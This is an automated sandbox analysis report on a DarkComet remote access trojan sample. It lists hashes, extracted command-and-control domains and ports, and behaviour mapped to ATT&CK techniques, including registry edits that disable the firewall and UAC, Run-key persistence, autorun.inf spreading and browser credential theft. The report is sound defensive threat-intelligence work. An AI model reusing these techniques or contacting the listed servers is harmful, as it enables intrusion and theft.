darkcomet | 1d34ccc414f59436188e5c8a29963e16b0913b1f148c4f51eafe6ae23176ea55

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
21/03/2025, 15:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
Size

938KB
MD5

83c698151d075740628ae7d8aaf39023
SHA1

f4725174c66a837870f74222b7cc4fa19160731b
SHA256

1d34ccc414f59436188e5c8a29963e16b0913b1f148c4f51eafe6ae23176ea55
SHA512

7a970cc742bb5103c4b7296b6f9ac11ee3870be5a8bebba75ebd2d7a0403dacbf5723b3e13bdd7dd40d628c00678feaf5f86b2a5cbe3d947cbcd23c3fa5bb04d
SSDEEP

24576:2FTqADbP4qXsZejCxQZPUQz/neABpcIssX0viImQG:ETvgqcZnQRUQbeAvcIhGi

Score

10^/10

darkcomet tonkman defense_evasion discovery persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

darkcomet

Botnet

Tonkman

iiili.in:5300

iiili.in:5310

iiili.in:5320

iiili.in:5330

iiili.in:5340

iiili.in:5350

iiili.in:5360

iiili.in:5370

iiili.in:5380

iiili.in:5390

illiil.in:5300

illiil.in:5310

illiil.in:5320

illiil.in:5330

illiil.in:5340

illiil.in:5350

illiil.in:5360

illiil.in:5370

illiil.in:5380

illiil.in:5390

Mutex

BugTestingReporter

Attributes

gencode
5d7taAMln2CM
install
false
offline_keylogger
true
persistence
false

rc4.plain

Signatures

Darkcomet
DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.
trojan rat darkcomet
Darkcomet family
darkcomet

Modifies firewall policy service 3 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies Windows Firewall 2 TTPs 6 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
920	netsh.exe
220	netsh.exe
3092	netsh.exe
2960	netsh.exe
2712	netsh.exe
3612	netsh.exe

Sets file to hidden 1 TTPs 11 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3028	attrib.exe
1776	attrib.exe
1524	attrib.exe
1588	attrib.exe
1396	attrib.exe
3092	attrib.exe
2524	attrib.exe
3312	attrib.exe
624	attrib.exe
4320	attrib.exe
3872	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe

Executes dropped EXE 1 IoCs

pid	Process
736	errorreporter.exe

Loads dropped DLL 1 IoCs

pid	Process
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nvidgfx = "C:\\Users\\Admin\\AppData\\Roaming\\nvidgfx.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nvidgfx = "C:\\Users\\Admin\\AppData\\Roaming\\nvidgfx.exe"	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe

Drops desktop.ini file(s) 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\Videos\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	wmplayer.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\T:	wmplayer.exe
File opened (read-only)	\??\I:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\Q:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\M:	wmplayer.exe
File opened (read-only)	\??\A:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\R:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\A:	wmplayer.exe
File opened (read-only)	\??\B:	wmplayer.exe
File opened (read-only)	\??\U:	wmplayer.exe
File opened (read-only)	\??\S:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\O:	wmplayer.exe
File opened (read-only)	\??\O:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\H:	wmplayer.exe
File opened (read-only)	\??\Q:	wmplayer.exe
File opened (read-only)	\??\X:	wmplayer.exe
File opened (read-only)	\??\J:	wmplayer.exe
File opened (read-only)	\??\G:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\N:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\W:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\Y:	wmplayer.exe
File opened (read-only)	\??\B:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\M:	unregmp2.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\Z:	wmplayer.exe
File opened (read-only)	\??\U:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\X:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\Z:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\N:	wmplayer.exe
File opened (read-only)	\??\W:	wmplayer.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\E:	wmplayer.exe
File opened (read-only)	\??\S:	wmplayer.exe
File opened (read-only)	\??\E:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\L:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\P:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\T:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\V:	wmplayer.exe
File opened (read-only)	\??\K:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened (read-only)	\??\I:	wmplayer.exe
File opened (read-only)	\??\K:	wmplayer.exe
File opened (read-only)	\??\L:	wmplayer.exe
File opened (read-only)	\??\P:	wmplayer.exe
File opened (read-only)	\??\R:	wmplayer.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\H:	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe

Drops autorun.inf file 1 TTPs 6 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	\??\Z:\autorun.inf	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File created	D:\autorun.inf	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	C:\autorun.inf	attrib.exe
File created	C:\autorun.inf	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
File created	F:\autorun.inf	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 736 set thread context of 4048	736	errorreporter.exe	144

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	attrib.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727	attrib.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4312	sc.exe
1496	sc.exe
2020	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unregmp2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmplayer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe

Modifies Control Panel 5 IoCs

defense_evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\Desktop\ScreenSaveActive = "1"	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\Desktop\ScreenSaveTimeOut = "60"	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\Desktop	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\Desktop\SCRNSAVE.EXE = "-0x1.1a5930p+105ppdata\\Microsoft\\Windows\\U‹ìjÿh:pS\x03d¡.scr"	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\Desktop\ScreenSaveActive = "1"	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe

Modifies Internet Explorer settings 1 TTPs 14 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_StatusBar = "yes"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\MINIE	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MINIE\ShowStatusBar = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Check_Associations = "no"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_URLinStatusBar = "yes"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT = "0"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_FullURL = "yes"	reg.exe

Modifies registry class 7 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ShellNew\FileName = "C:\\Users\\Admin\\AppData\\Roaming\\newzip.dat"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ShellNew	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ShellNew\FileName = "C:\\Users\\Admin\\AppData\\Roaming\\newzip.dat"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.zip\CompressedFolder\ShellNew	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.zip\CompressedFolder\ShellNew\FileName = "C:\\Users\\Admin\\AppData\\Roaming\\newzip.dat"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ShellNew	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
640	JaffaCakes118_83c698151d075740628ae7d8aaf39023.exe
